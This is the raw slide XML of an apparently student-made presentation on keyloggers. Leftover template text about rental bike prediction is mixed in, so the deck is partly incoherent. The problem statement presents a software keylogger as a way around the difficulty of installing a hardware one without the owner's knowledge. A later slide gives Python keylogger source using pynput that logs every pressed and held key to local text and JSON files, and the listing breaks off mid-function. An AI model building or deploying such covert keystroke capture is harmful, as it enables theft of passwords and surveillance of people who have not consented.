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Libre Franklin"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
      <p:italic r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Franklin Gothic"/>
      <p:bold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LibreFranklin-boldItalic.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/FranklinGothic-bold.fntdata"/><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LibreFranklin-regular.fntdata"/><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LibreFranklin-italic.fntdata"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LibreFranklin-bold.fntdata"/><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3" name="Google Shape;16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6d839f967f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6d839f967f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KEYLOGGERS SECURITY</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708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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Akshaya M N, Kings Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>College</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, CSE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Department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840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000"/>
              <a:t>By employers to observe employees computer activities. By parents to supervise their children’s internet usage. By device owners to track possible unauthorized activity on their devices.</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-206121" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p22"/>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60" name="Google Shape;160;p2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2208"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>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4"/>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700"/>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49575" y="1618938"/>
            <a:ext cx="11019000" cy="5239200"/>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r>
              <a:rPr lang="en-IN" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Should not include 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r>
              <a:rPr lang="en-IN" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Technology Used)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Algorithm &amp; Deployment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(Output Image)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3" y="1237632"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-206121" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  The problem statement is that the keyloggers can be detected using antiviruses. Installation of hardware keyloggers is difficult without the knowledge of the owner of the system. The solution to the above existing problem is that we can build a software keyloggers instead of hardware keyloggers.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41671" y="1087378"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-235330" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1104"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Collection: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Gather historical data on bike rentals, including time, date, location, and other relevant factors.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Utilize real-time data sources, such as weather conditions, events, and holidays, to enhance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Data Preprocessing:</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Clean and preprocess the collected data to handle missing values, outliers, and inconsistencies.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Feature engineering to extract relevant features from the data that might impact bike demand.</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Machine Learning Algorithm:</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Implement a machine learning algorithm, such as a time-series forecasting model (e.g., ARIMA, SARIMA, or LSTM), to predict bike counts based on historical patterns.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Consider incorporating other factors like weather conditions, day of the week, and special events to improve prediction accuracy.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Deployment:</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Develop a user-friendly interface or application that provides real-time predictions for bike counts at different hours.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Deploy the solution on a scalable and reliable platform, considering factors like server infrastructure, response time, and user accessibility.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1104"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Evaluation:</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Assess the model's performance using appropriate metrics such as Mean Absolute Error (MAE), Root Mean Squared Error (RMSE), or other relevant metrics.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1104"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1200">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Fine-tune the model based on feedback and continuous monitoring of prediction accuracy.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1104"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1200"/>
              <a:t>Result:</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>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7"/>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2" name="Google Shape;122;p17"/>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1656"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The "System Approach" section outlines the overall strategy and methodology for developing and implementing the rental bike prediction system. Here's a suggested structure for this section:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1656"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100 MB free disk space, Pentium II processor, 512 MB RAM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1656"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.ywin32 ,p.yhook</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ALGORITHM &amp; DEPLOYMENT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p18"/>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288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t>In the Algorithm section, describe the machine learning algorithm chosen for predicting bike counts. Here's an example structure for this section:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1400"/>
              <a:t>Algorithm Selection:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Provide a brief overview of the chosen algorithm (e.g., time-series forecasting model, like ARIMA or LSTM) and justify its selection based on the problem statement and data characteristics.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1400"/>
              <a:t>Data Input:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Specify the input features used by the algorithm, such as historical bike rental data, weather conditions, day of the week, and any other relevant factors.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1400"/>
              <a:t>Training Process:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Explain how the algorithm is trained using historical data. Highlight any specific considerations or techniques employed, such as cross-validation or hyperparameter tuning.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1400"/>
              <a:t>Prediction Process:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="880"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1288"/>
              <a:buChar char="◼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>Detail how the trained algorithm makes predictions for future bike counts. Discuss any real-time data inputs considered during the prediction phase.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-206121" lvl="0" marL="305435" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>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686025" y="1118250"/>
            <a:ext cx="11029500" cy="3937500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>import json</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keys_used = []</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>keys = ""</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generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        keys.write(key)</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generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        key_log.write(key_list_bytes)</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on_press(key):</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        flag = True</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    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
